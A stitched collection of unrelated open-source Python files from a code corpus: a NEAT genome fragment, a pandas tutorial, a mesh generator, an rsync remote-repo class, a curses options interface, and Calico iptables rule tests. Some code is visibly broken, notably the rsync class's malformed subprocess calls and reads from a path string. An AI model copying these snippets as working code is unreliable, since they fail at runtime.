if self.node_genes[split_conn.in_node_id].type == 'HIDDEN':
mini = self.node_order.index(split_conn.in_node_id) + 1
else:
# Presynaptic node is an input node, not hidden node
mini = 0
if self.node_genes[split_conn.out_node_id].type == 'HIDDEN':
maxi = self.node_order.index(split_conn.out_node_id)
else:
# Postsynaptic node is an output node, not hidden node
maxi = len(self.node_order)
self.node_order.insert(randint(mini, maxi), ng.ID)
assert (len(self.node_order) == len([n for n in self.node_genes.values() if n.type == 'HIDDEN']))
return ng, split_conn
def mutate_add_connection(self, innovation_indexer):
'''
Attempt to add a new connection, with the restrictions that (1) the output node
cannot be one of the network input nodes, and (2) the connection must be feed-forward.
'''
possible_inputs = [n for n in self.node_genes.values() if n.type != 'OUTPUT']
possible_outputs = [n for n in self.node_genes.values() if n.type != 'INPUT']
in_node = choice(possible_inputs)
out_node = choice(possible_outputs)
# Only create the connection if it's feed-forward and it doesn't already exist.
if self.__is_connection_feedforward(in_node, out_node):
key = (in_node.ID, out_node.ID)
if key not in self.conn_genes:
weight = gauss(0, self.config.weight_stdev)
enabled = choice([False, True])
innovation_id = innovation_indexer.get_innovation_id(in_node.ID, out_node.ID)
cg = self.config.conn_gene_type(innovation_id, in_node.ID, out_node.ID, weight, enabled)
self.conn_genes[cg.key] = cg
def mutate_delete_node(self):
deleted_id = super(FFGenome, self).mutate_delete_node()
if deleted_id != -1:
self.node_order.remove(deleted_id)
assert len(self.node_genes) >= self.num_inputs + self.num_outputs
def __is_connection_feedforward(self, in_node, out_node):
if in_node.type == 'INPUT' or out_node.type == 'OUTPUT':
return True
assert in_node.ID in self.node_order
assert out_node.ID in self.node_order
return self.node_order.index(in_node.ID) < self.node_order.index(out_node.ID)
def add_hidden_nodes(self, num_hidden):
node_id = self.get_new_hidden_id()
for i in range(num_hidden):
act_func = choice(self.config.activation_functions)
node_gene = self.config.node_gene_type(node_id,
node_type='HIDDEN',
activation_type=act_func)
assert node_gene.ID not in self.node_genes
self.node_genes[node_gene.ID] = node_gene
self.node_order.append(node_gene.ID)
node_id += 1
def __str__(self):
s = super(FFGenome, self).__str__()
s += '\nNode order: ' + str(self.node_order)
return s
| bsd-3-clause | -6,289,822,825,548,730,000 | 39.539301 | 119 | 0.574137 | false |
robmarano/nyu-python | course-2/session-7/pandas/df_basics.py | 1 | 2677 | #!/usr/bin/env python3
try:
# for Python 2.x
import StringIO
except:
# for Python 3.x
import io
import csv
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
# define data
csv_input = """timestamp,title,reqid
2016-07-23 11:05:08,SVP,2356556-AS
2016-12-12 01:23:33,VP,5567894-AS
2016-09-13 12:43:33,VP,3455673-AS
2016-09-13 19:43:33,EVP,8455673-AS
2016-09-30 11:43:33,VP,9455673-AS
2016-08-02 01:23:33,VP,5698765-AS
2016-04-22 01:23:33,VP,1234556-AS
"""
# load data
try:
# for Python 2.x
f = StringIO.StringIO(csv_input)
except:
# for Python 3.x
f = io.StringIO(csv_input)
reader = csv.reader(f, delimiter=',')
for row in reader:
print('\t'.join(row))
# reset file pointer position to beginning of file
f.seek(0)
# create pandas dataframe
#df = pd.read_csv(io.StringIO(csv_input))
df = pd.read_csv(f)
print(df.head())
print(df.info())
print(df)
df['date'] = pd.DatetimeIndex(df.timestamp).normalize()
print(df)
print(df.index)
#df = df.drop('timestamp',axis=1)
df.drop('timestamp', axis=1, inplace=True)
#df = df.reindex(df.reqid, fill_value=0)
#df = df.reindex(df.reqid, method='bfill')
#print(df)
#print(df.index)
#i = df[((df.title == 'SVP') & (df.reqid == '3455673-AS'))].index
#df.drop(df.index[0],inplace=True)
#df.drop(i,inplace=True)
#i = df.index[0]
#df = df.drop(i)
#print(df)
#print(i)
print(type(df['date'][0]))
#df = df.sort_values(by='date',axis=0,ascending=True)
df.sort_values(by='date',axis=0,ascending=True,inplace=True)
print(df)
df['weekday'] = df['date'].apply( lambda x: x.dayofweek)
# setup date processing
now_string = '2016-10-01 08:01:20'
past_by_days = 30
time_delta = pd.to_timedelta('{} days'.format(past_by_days))
print(time_delta)
#now = pd.tslib.Timestamp('2016-10-01 08:01:20')
now = pd.Timestamp(now_string)
now_norm = now.normalize()
print(now_norm)
now_start = now_norm - time_delta
print(now_start)
# process
ddf = df.loc[((df['date'] >= now_start) & (df['date'] <= now_norm))]
print(ddf)
print('number of observations found in filtered df = {}'.format(len(ddf)))
print(len(ddf.columns))
# histogram of number of observations by date
df_grouped_date = df.groupby(['date'])
df_date_count = df_grouped_date['reqid'].aggregate(['count'])
#df_date_count = df_grouped_date.aggregate(['count'])
print(df_date_count)
#exclude_cols = ['title count']
#df_date_count.ix[:, df_date_count.columns.difference(exclude_cols)].plot(kind='bar')
df_date_count.ix[:, df_date_count.columns].plot(kind='bar')
plt.legend(loc='best').get_texts()[0].set_text('Reqs Added Per Day')
file_name = 'myBar'
file_name = re.sub('\s+','_',file_name)
plt.savefig(file_name)
plt.show()
| mit | -4,452,807,237,788,922,400 | 22.482456 | 85 | 0.680613 | false |
mathLab/RBniCS | tutorials/11_quasi_geostrophic/data/generate_mesh.py | 1 | 1376 | # Copyright (C) 2015-2021 by the RBniCS authors
#
# This file is part of RBniCS.
#
# SPDX-License-Identifier: LGPL-3.0-or-later
from dolfin import *
from mshr import *
# Create mesh
domain = Rectangle(Point(0., 0.), Point(1., 1.))
mesh = generate_mesh(domain, 30)
# Create subdomains
subdomains = MeshFunction("size_t", mesh, 2)
subdomains.set_all(0)
# Create boundaries
class Left(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 0.) < DOLFIN_EPS
class Right(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 1.) < DOLFIN_EPS
class Bottom(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 0.) < DOLFIN_EPS
class Top(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 1.) < DOLFIN_EPS
boundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
bottom = Bottom()
bottom.mark(boundaries, 1)
right = Right()
right.mark(boundaries, 2)
top = Top()
top.mark(boundaries, 3)
left = Left()
left.mark(boundaries, 4)
# Save
File("square.xml") << mesh
File("square_physical_region.xml") << subdomains
File("square_facet_region.xml") << boundaries
XDMFFile("square.xdmf").write(mesh)
XDMFFile("square_physical_region.xdmf").write(subdomains)
XDMFFile("square_facet_region.xdmf").write(boundaries)
| lgpl-3.0 | 7,467,292,417,435,287,000 | 23.571429 | 68 | 0.68532 | false |
Hummer12007/pomu | pomu/repo/remote/rsync.py | 1 | 1673 | """A class for remote rsync repos"""
from os import rmdir, mkfifo, unlink, path
from subprocess import run
from tempfile import mkdtemp
from pomu.repo.remote.remote import RemoteRepo, normalize_key
from pomu.util.result import Result
class RemoteRsyncRepo(RemoteRepo):
"""A class responsible for rsync remotes"""
def __init__(self, url):
self.uri = url
def __enter__(self):
pass
def __exit__(self, *_):
pass
def fetch_tree(self):
"""Returns repos hierarchy"""
if hasattr(self, '_tree'):
return self._tree
d = mkdtemp()
p = run('rsync', '-rn', '--out-format="%n"', self.uri, d)
rmdir(d)
if p.returncode:
return Result.Err()
self._tree = ['/' + x for x in p.stdout.split('\n')]
return self._tree
def fetch_subtree(self, key):
"""Lists a subtree"""
k = normalize_key(key, True)
self.fetch_tree()
dic = dict(self._tree)
if k not in dic:
return []
l = len(key)
return Result.Ok(
[tpath[l:] for tpath in self.fetch_tree() if tpath.startswith(k)])
def fetch_file(self, key):
"""Fetches a file from the repo"""
k = normalize_key(key)
self.fetch_tree()
dic = dict(self._tree)
if k not in dic:
return Result.Err()
d = mkdtemp()
fip = path.join(d, 'fifo')
mkfifo(fip)
p = run('rsync', self.uri.rstrip('/') + key, fip)
fout = fip.read()
unlink(fip)
rmdir(d)
if p.returncode:
return Result.Err()
return Result.Ok(fout)
| gpl-2.0 | -8,406,564,571,039,926,000 | 27.355932 | 82 | 0.537358 | false |
jag1g13/pycgtool | pycgtool/interface.py | 1 | 9604 | """
This module contains classes for interaction at the terminal.
"""
import collections
import curses
import curses.textpad
import time
class Options:
"""
Class to hold program options not specified at the initial command line.
Values can be queried by indexing as a dictionary or by attribute. Iterable.
"""
def __init__(self, default, args=None):
"""
Create Options instance from iterable of keys and default values.
:param default: Iterable of key, default value pairs (e.g. list of tuples)
:param args: Optional program arguments from Argparse, will be displayed in interactive mode
"""
self._dict = collections.OrderedDict()
for key, val in default:
try:
val = val.lower()
except AttributeError:
pass
self._dict[key.lower()] = (val, type(val))
# Allow to carry options from argparse
self.args = args
def __getattr__(self, attr):
return self._dict[attr.lower()][0]
def __repr__(self):
res = "[" + ", ".join((str((key, val[0])) for key, val in self._dict.items())) + "]"
return res
def __iter__(self):
return iter(((key, val[0]) for key, val in self._dict.items()))
def __len__(self):
return len(self._dict)
def __getitem__(self, item):
try:
return self._dict[item]
except KeyError:
try:
opt = list(self._dict.keys())[item]
return self._dict[opt][0]
except TypeError:
raise TypeError("Must access Options using either a string or an integer")
def set(self, opt, val):
"""
Set an argument by name.
:param opt: Option to set
:param val: Value to set option to
"""
opt = opt.lower()
try:
val = val.lower()
except AttributeError:
pass
_type = self._dict[opt][1]
if _type is not type(val):
if _type is bool:
self._dict[opt] = (_truthy(val), bool)
else:
self._dict[opt] = (_type(val), _type)
else:
self._dict[opt] = (val, _type)
def _set_by_num(self, opt_num, val):
"""
Set an argument if only its position in sequence is known.
For use in Options._inter.
:param opt_num: Sequence number of option to set
:param val: Value to set option to
"""
opt = list(self._dict.keys())[opt_num]
self.set(opt, val)
def toggle_boolean(self, opt):
"""
Toggle a boolean argument by name.
:param opt: Option to toggle
"""
entry = self._dict[opt]
if entry[1] is bool:
self._dict[opt] = (not entry[0], entry[1])
else:
raise TypeError("Only boolean options can be toggled")
def _toggle_boolean_by_num(self, opt_num):
"""
Toggle a boolean argument if only its position in sequence is known.
For use in Options._inter.
:param opt_num: Sequence number of option to toggle
"""
opt = list(self._dict.keys())[opt_num]
self.toggle_boolean(opt)
def interactive(self):
"""
Read options in interactive terminal mode using curses.
"""
curses.wrapper(self._inter)
def _inter(self, stdscr):
"""
Read options in interactive terminal mode using curses.
:param stdscr: Curses window to use as interface
"""
stdscr.clear()
if self.args is not None:
stdscr.addstr(1, 1, "Using GRO: {0}".format(self.args.gro))
stdscr.addstr(2, 1, "Using XTC: {0}".format(self.args.xtc))
stdscr.addstr(4, 1, "Press q to proceed")
stdscr.box()
stdscr.refresh()
nrows = len(self)
errscr = stdscr.derwin(3, curses.COLS - 3, nrows + 8, 1)
errscr.border()
window_config = stdscr.derwin(nrows + 2, curses.COLS - 3, 5, 1)
window_config.box()
window_config.refresh()
window_keys = window_config.derwin(nrows, 20, 1, 0)
window_config.vline(1, 18, curses.ACS_VLINE, nrows)
window_vals = window_config.derwin(nrows, curses.COLS - 24, 1, 20)
text_edit_wins = []
text_inputs = []
for i, (key, value) in enumerate(self):
window_keys.addstr(i, 0, key)
try:
text_edit_wins.append(window_vals.derwin(1, 30, i, 0))
except curses.error as e:
raise RuntimeError("Your terminal is too small to fit the interface, please expand it") from e
text_edit_wins[-1].addstr(0, 0, str(value))
text_inputs.append(curses.textpad.Textbox(text_edit_wins[-1]))
stdscr.refresh()
window_keys.refresh()
for window in text_edit_wins:
window.refresh()
pos = 0
move = {"KEY_UP": lambda x: (x - 1) % nrows,
"KEY_DOWN": lambda x: (x + 1) % nrows,
"KEY_LEFT": lambda x: x,
"KEY_RIGHT": lambda x: x}
while True:
key = text_edit_wins[pos].getkey(0, 0)
errscr.erase()
if key in move:
pos = move[key](pos)
if key == "\n":
if type(self[pos]) is bool:
self._toggle_boolean_by_num(pos)
else:
val = text_inputs[pos].edit().strip()
try:
self._set_by_num(pos, val)
except ValueError:
errscr.addstr(0, 0, "Invalid value '{0}' for option".format(val))
errscr.addstr(1, 0, "Value has been reset".format(val))
text_edit_wins[pos].erase()
text_edit_wins[pos].addstr(0, 0, str(self[pos]))
text_edit_wins[pos].refresh()
errscr.refresh()
if key == "q":
break
def _truthy(string):
"""
Evaluate a string as True or False in the natural way.
:param string: String to evaluate
:return: True or False
"""
truthy_strings = ("yes", "y", "on", "true", "t", "1")
falsey_strings = ("no", "n", "off", "false", "f", "0")
string = string.lower().strip()
if string in truthy_strings:
return True
elif string in falsey_strings:
return False
else:
raise ValueError("Value '{0}' could not be converted to boolean".format(string))
class Progress:
"""
Display a progress bar during the main loop of a program.
"""
def __init__(self, maxits, length=20, dowhile=None, quiet=False):
"""
Return progress bar instance to handle printing of a progress bar within loops.
:param maxits: Expected number of iterations
:param length: Length of progress bar in characters
:param dowhile: Function to call after each iteration, stops if False
:param quiet: Skip printing of progress bar - for testing
"""
self._maxits = maxits
self._length = length
self._dowhile = dowhile
self._quiet = quiet
self._its = -1
self._start_time = time.clock()
def __len__(self):
"""
Maximum iterator length.
This length will be reached if the iterator is not stopped by a False dowhile condition or KeyboardInterrupt.
:return: Maximum length of iterator
"""
return self._maxits - self._its
def __iter__(self):
return self
def __next__(self):
"""
Allow iteration over Progress while testing dowhile condition.
Will catch Ctrl-C and return control as if the iterator has been fully consumed.
:return: Iteration number
"""
self._its += 1
try:
if self._dowhile is not None and self._its > 0 and not self._dowhile():
self._stop()
except KeyboardInterrupt:
print(end="\r")
self._stop()
if self._its >= self._maxits:
self._stop()
if not self._quiet:
self._display()
return self._its
def run(self):
"""
Iterate through self until stopped by maximum iterations or False condition.
Use the tqdm library if it is present.
"""
no_tqdm = False
try:
from tqdm import tqdm
except ImportError:
no_tqdm = True
if self._quiet or no_tqdm:
collections.deque(self, maxlen=0)
else:
self._quiet = True
collections.deque(tqdm(self, total=len(self)-1, ncols=80), maxlen=0)
self._quiet = False
return self._its
@property
def _bar(self):
done = int(self._length * (self._its / self._maxits))
left = self._length - done
width = len(str(self._maxits))
return "{0:-{width}} [".format(self._its, width=width) + done * "#" + left * "-" + "] {0}".format(self._maxits)
def _stop(self):
if not self._quiet:
time_taken = int(time.clock() - self._start_time)
print(self._bar + " took {0}s".format(time_taken))
raise StopIteration
def _display(self):
try:
time_remain = int((time.clock() - self._start_time) * ((self._maxits - self._its) / self._its))
except ZeroDivisionError:
time_remain = "-"
print(self._bar + " {0}s left".format(time_remain), end="\r")
| gpl-3.0 | 1,517,225,959,199,254,800 | 29.980645 | 119 | 0.53915 | false |
TrimBiggs/calico | calico/felix/test/test_fiptgenerator.py | 1 | 22422 | # -*- coding: utf-8 -*-
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
felix.test.test_fiptgenerator.py
~~~~~~~~~~~~~~~~~~~~~~~~~
Tests of iptables rules generation function.
"""
import logging
from collections import OrderedDict
from calico.felix.selectors import parse_selector
from mock import Mock
from calico.datamodel_v1 import TieredPolicyId
from calico.felix.fiptables import IptablesUpdater
from calico.felix.profilerules import UnsupportedICMPType
from calico.felix.test.base import BaseTestCase, load_config
_log = logging.getLogger(__name__)
DEFAULT_MARK = '--append %s --jump MARK --set-mark 0x1000000/0x1000000'
DEFAULT_UNMARK = (
'--append %s '
'--match comment --comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'
)
INPUT_CHAINS = {
"Default": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"IPIP": [
'--append felix-INPUT --protocol 4 --match set ! --match-set felix-hosts src --jump DROP',
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"Return": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 130',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 131',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 132',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 133',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 135',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 136',
'--append felix-INPUT --protocol udp --sport 546 --dport 547 --jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump felix-FROM-ENDPOINT',
]
}
SELECTOR_A_EQ_B = parse_selector("a == 'b'")
RULES_TESTS = [
{
"ip_version": 4,
"tag_to_ipset": {},
"sel_to_ipset": {SELECTOR_A_EQ_B: "a-eq-b"},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
],
"outbound_rules": [
{"dst_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i '
'--match set --match-set a-eq-b src '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-i --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
'--append felix-p-prof1-o '
'--match set --match-set a-eq-b dst '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-o --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_net": "10.0.0.0/8"}
],
"outbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7,
"icmp_code": 123}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i --source 10.0.0.0/8 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmp --source "
"10.0.0.0/8 --match icmp --icmp-type 7/123 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "tcp",
"src_ports": [0, "2:3", 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,
14, 15, 16, 17]
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmp --source 10.0.0.0/8 "
"--match icmp --icmp-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 0,2:3,4,5,6,7,8,9,10,11,12,13,14,15 "
"--jump RETURN",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 16,17 "
"--jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 6,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7,
"action": "deny"
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump DROP",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
]
FROM_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-from-abcd --jump MARK --set-mark 0/0x1000000',
# From chain polices the MAC address.
'--append felix-from-abcd --match mac ! --mac-source aa:22:33:44:55:66 '
'--jump DROP -m comment --comment '
'"Incorrect source MAC"',
# Now the tiered policies. For each tier we reset the "next tier" mark.
'--append felix-from-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
# Then, for each policies, we jump to the policies, and check if it set the
# accept mark, which immediately accepts.
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p2-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
# Then, at the end of the tier, drop if nothing in the tier did a
# "next-tier"
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Now the second tier...
'--append felix-from-abcd '
'--jump MARK --set-mark 0/0x2000000 --match comment '
'--comment "Start of tier tier_2"',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t2p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 --match comment '
'--comment "Return if policy accepted" --jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --match comment '
'--comment "Drop if no policy in tier passed" --jump DROP',
# Jump to the first profile.
'--append felix-from-abcd --jump felix-p-prof-1-o',
# Short-circuit: return if the first profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile.
'--append felix-from-abcd --jump felix-p-prof-2-o',
# Return if the second profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop the packet if nothing matched.
'--append felix-from-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
TO_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-to-abcd --jump MARK --set-mark 0/0x1000000',
# Then do the tiered policies in order. Tier 1:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Tier 2:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_2"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t2p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Jump to first profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop anything that doesn't match.
'--append felix-to-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
class TestGlobalChains(BaseTestCase):
def setUp(self):
super(TestGlobalChains, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_build_input_chain(self):
chain, deps = self.iptables_generator.filter_input_chain(ip_version=4)
self.assertEqual(chain, INPUT_CHAINS["Default"])
self.assertEqual(deps, set())
def test_build_input_chain_ipip(self):
chain, deps = self.iptables_generator.filter_input_chain(
ip_version=4,
hosts_set_name="felix-hosts")
self.assertEqual(chain, INPUT_CHAINS["IPIP"])
self.assertEqual(deps, set())
def test_build_input_chain_return(self):
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "RETURN"
}
config = load_config("felix_default.cfg", host_dict=host_dict)
chain, deps = config.plugins["iptables_generator"].filter_input_chain(
ip_version=6)
self.assertEqual(chain, INPUT_CHAINS["Return"])
self.assertEqual(deps, set(["felix-FROM-ENDPOINT"]))
class TestRules(BaseTestCase):
def setUp(self):
super(TestRules, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_profile_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names("prof1")
self.assertEqual(chain_names, set(["felix-p-prof1-i", "felix-p-prof1-o"]))
def test_tiered_policy_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names(
TieredPolicyId("tier", "pol")
)
self.assertEqual(chain_names,
set(['felix-p-tier/pol-o',
'felix-p-tier/pol-i']))
def test_split_port_lists(self):
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, "2:3", 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17]),
[['1', '2:3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16', '17']]
)
def test_rules_generation(self):
for test in RULES_TESTS:
updates, deps = self.iptables_generator.profile_updates(
test["profile"]["id"],
test["profile"],
test["ip_version"],
test["tag_to_ipset"],
selector_to_ipset=test.get("sel_to_ipset", {}),
on_allow=test.get("on_allow", "RETURN"),
on_deny=test.get("on_deny", "DROP")
)
self.assertEqual((updates, deps), (test["updates"], {}))
def test_unknown_action(self):
updates, deps = self.iptables_generator.profile_updates(
"prof1",
{
"inbound_rules": [{"action": "unknown"}],
"outbound_rules": [{"action": "unknown"}],
},
4,
{},
selector_to_ipset={},
)
self.maxDiff = None
# Should get back a drop rule.
drop_rules_i = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-i",
None,
"ERROR failed to parse rules",
)
drop_rules_o = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-o",
None,
"ERROR failed to parse rules",
)
self.assertEqual(
updates,
{
'felix-p-prof1-i':
['--append felix-p-prof1-i --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_i +
['--append felix-p-prof1-i --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'],
'felix-p-prof1-o':
['--append felix-p-prof1-o --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_o +
['--append felix-p-prof1-o --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000']
}
)
def test_bad_icmp_type(self):
